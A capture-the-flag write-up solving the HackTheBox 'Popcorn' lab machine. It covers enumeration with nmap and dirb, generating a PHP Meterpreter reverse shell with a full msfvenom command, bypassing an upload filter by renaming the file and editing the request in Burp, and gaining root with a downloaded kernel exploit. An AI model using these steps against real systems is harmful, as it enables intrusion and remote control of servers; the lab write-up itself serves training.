Hello guys, today we are going to solve the popcorn machine in hackthebox. These kinds of machines are useful to increase skills in the area of penetration testing.

Popcorn is an intermediate level machine and its quite easy to own the machine.

So, let’s get started by scanning the network.

Scanning is the first phase to find out the services running in the machine and we can exploit them.

COMMAND: nmap -A 10.10.10.6

Nmap scan

From the given above image, you can observe we found port 22,80 are open in the network.

Webpage

Knowing port 80 is open in the network we are exploring his IP in the browser but didn’t get any remarkable clue for the next step.

Next, we will try to use dirb tool of Kali to enumerate the directories from using the IP Address. The command we have used is dirb http://10.10.10.6  After checking most of the directories, we finally decided to go for /torrent directory.

So next we will try to explore http://10.10.10.6/torrent/ through browser URL and what we see is a Webpage shown below. After looking at the page for some clue, we saw that we need to register on this site first.

torrent

After clicking on the Register option on the Webpage. The registration form is opened below. As you can see you need to give details to successfully register on this site

Register

After successfully registering on the website. Click on the Upload option and the page opened is inbelow. Now here we have given the path of any torrent file. Then Click on upload as shown below.

Upload option
Torrent file

When the torrent file is uploaded successfully. So the next page we are redirected is opened below. Now simply click on Edit this torrent option.

Torrent file

As we see the torrent file is uploaded successfully.we will try to edit the torrent and find any way to upload a shell.

Let’s generate a shell from the tool called msfvenom🙂

COMMAND: msfvenom -p php/meterpreter/reverse_tcp lhost=10.10.14.16 lport=4444 -f raw

We finally generated a PHP shell. Just copy-paste into a file and save it as shell.php.

Click the option EDIT THIS TORRENT. Upload the shell file and click submit

Now the problem is it won’t accept any PHP formats as a security method:( so let’s change the extension to png

so let’s fire up burp and bypass the security measure and upload the shell by tampering the request:)

Just remove the extension .png and forward request 🙂

BOOM!! The file got uploaded successfully and we bypass the security measure:)

Now lets setup a listener in the kali with the help of Metasploit inbuilt module called msfconsole.

In order to get the shell we need to run the php shell in the web server and its possible in loading the file in our webpage:)

let’s find out where the shell is uploaded in the webserver 🙂

After using dirb tool, i able to know there is an upload folder where all the files being uploaded are stored in the folder🙂

COMMAND: dirb http://10.10.10.6

lets check the folder upload by loading in the browser🙂

As we can know the file is uploaded successfully with the name of the hash value 🙂

let’s try to open the file then we got the shell in meterpreter:)

BOOM!! the shell got opened 🙂

Once we have got the meterpreter. We have used command cd /home. Then we check inside the george directory using command ls /home/george, here we found out the user.txt file and read the file content which contains our first FLAG!!

but we cant access higher level privileges in the shell:(

To get the higher privileges we use an exploit.

Now we have searched kernel exploit on google, where we found that it is an exploit that is used for getting Local privilege escalation. We have simply downloaded the file on our Desktop.

As you can see we have uploaded using the command upload /root/Desktop/15704.c Now we have used the command shell to access the root privilege. Now we have compiled. Next, we have given permission to the exploit. Using cd /root command we have found a root.txt file. And to view the contents we have used cat root.txt command. In the end, we have found our Final FLAG!!🙂

If you like my writeup , Give me Respect on my HTB profile : Exp1o1t9r

LEAVE A REPLY

Please enter your comment!
Please enter your name here